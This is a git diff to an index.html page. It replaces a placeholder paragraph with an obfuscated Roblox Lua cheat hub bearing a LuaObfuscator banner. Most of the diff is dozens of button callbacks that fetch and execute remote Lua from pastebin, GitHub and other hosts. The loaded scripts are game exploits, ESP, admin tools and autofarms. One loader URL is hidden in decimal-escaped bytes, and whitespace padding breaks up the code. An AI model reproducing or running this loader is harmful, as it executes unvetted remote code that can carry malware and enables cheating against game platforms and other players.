--- a/index.html
+++ b/index.html
@@ -12,7 +12,32 @@
 
 	<h1>--Hello world</h1>
 
-	<p>工程创建成功！</p>  
+	<p>--[[
+
+ .____                  ________ ___.    _____                           __                
+
+ |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
+
+ |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
+
+ |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
+
+ |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
+
+         \/          \/         \/    \/                \/     \/     \/                   
+
+          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 
+
+]]--
+
+local v0=loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Kronos"))();local v1=v0:Window({Title="高脚本，作者高斯函数",Accent=Color3.fromRGB(64 + 5 ,69,1272 -(68 + 997) ),Logo=3610246336 -(226 + 1044) ,ToggleKey=Enum.KeyCode.LeftAlt});local v2=loadstring(game:HttpGet("https://pastebin.com/raw/jtQdrjVU",true))();v2:Create("请输入卡114514 ","114514","9",function()print("Subscribe");end);local v3=v1:NewTab({Logo=4483345998 -0 });local v4=v3:TabSection({Title="TabSection"});local v5=v4:AddColumn({Title="脚本整合"});local v6=v5:Section({Title="Section"});v6:Toggle({Text="名字就是脚本名字",State=false,Callback=function()end});v6:Button({Text="criminality",Callback=function()loadstring(game:HttpGet("https://pastebin.com/raw/taKWxmZe"))();end});v6:Button({Text="ESP（通用）",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/2dgeneralspam1/cheatx/main/cheatx%20loader"))();end});v6:Button({Text="入侵者",Callback=function()loadstring(game:HttpGet("https://pastebin.com/raw/FGjjwm6W"))();end});v6:Button({Text="piggy",Callback=function()loadstring(game:HttpGet("https://pastebin.com/raw/PMuAYhks",true))();end});v6:Button({Text="scp roleplay",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Nicuse/RobloxScripts/main/SCPRoleplay.lua",true))();end});v6:Button({Text="耳光模拟器",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/cheesynob39/R2O/main/LOADSTRING.lua"))();end});v6:Button({Text="伐木大亨2",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Butterisgood/butter-hub/main/butters%20recode-obfuscated.lua"))("Apple is cute");end});v6:Button({Text="FE动画",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Dvrknvss/UniversalFEScriptHub/main/Script"))();end});v6:Button({Text="phantom forces",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Sulfate1/Odysey/main/Mainstring.lua"))();end});v6:Button({Text="进击的僵尸",Callback=function()loadstring(game:HttpGet("https://ghost-storage.7m.pl/scripts/ghosthublauncher.lua"))();end});v6:Button({Text="在披萨店工作",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/centerepic/WorkAtAPizzaPlaceAutofarm/main/WAPP_Legitfarmv2.lua"))();end});v6:Button({Text="一路向西",Callback=function()loadstring(game.HttpGet(game,"https://raw.githubusercontent.com/Exunys/westbound.pro-Utilites/main/Main.lua"))();end});v6:Button({Text="steep",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Hypeploits/Hypeploits/main/ADMIN%20INFINTE%20YIELD",true))();end});v6:Button({Text="变异微笑",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Nicuse/RobloxScripts/main/InfectiousSmile.lua",true))();end});v6:Button({Text="鲨口求生密钥Pearl_sduhgauw6iu736bihsa",Callback=function()loadstring(game:HttpGet("https://ppearl.vercel.app"))();end});v6:Button({Text="KAT",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/JNHHGaming/Kat12/main/Kat"))();end});v6:Button({Text="51区",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/GamingScripter/Saktk-In-Area51/main/Area51",true))();end});v6:Button({Text="3008",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/RunDTM/scripts/main/3008.lua"))();end});v6:Button({Text="监狱人生",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/H17S32/Tiger_Admin/main/Script"))();end});v6:Button({Text="布娃娃引擎",Callback=function()loadstring(game:HttpGet("https://gist.githubusercontent.com/H20CalibreYT/462f6e6236a9371130f113def6549bb1/raw/"))();end});v6:Button({Text="YBA",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/zakater5/LuaRepo/main/YBA/v3.lua"))();end});v6:Button({Text="监狱人生（杀死所有）",Callback=function()loadstring(game:HttpGet("https://paste.website/p/5352e9b1-70fe-4c27-9ec1-ec4203af2555.txt"))();end});v6:Button({Text="俄亥（密钥2ZZLJIUQTS7S1A1AZB）",Callback=
+		
+		
+		
+		
+
+loadstring(game:HttpGet(("https://raw.githubusercontent.com/mstudio45/MSDOORS/main/MSDOORS.lua"),true))();end});v6:Button({Text="兵工厂pw",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Maikderninja/Maikderninja/main/PWNERHUB.lua",true))();end});v6:Button({Text="起床战争vape v4",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua",true))();end});v6:Button({Text="大陀螺",Callback=function()loadstring(game:HttpGet("https://pastebin.com/raw/r97d7dS0",true))();end});v6:Button({Text="坤吧脚本（r6）",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/minecrafttotem/yzhs./main/Fe%20pp%20script%20very%20fun"))();end});v6:Button({Text="飞行",Callback=function()loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();end});
+		</p>  
 
   </body>
 
